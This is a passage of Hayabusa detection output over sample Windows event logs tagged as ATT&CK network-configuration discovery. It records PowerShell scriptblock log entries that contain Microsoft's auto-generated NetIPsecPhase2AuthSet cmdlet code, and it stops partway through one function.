'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 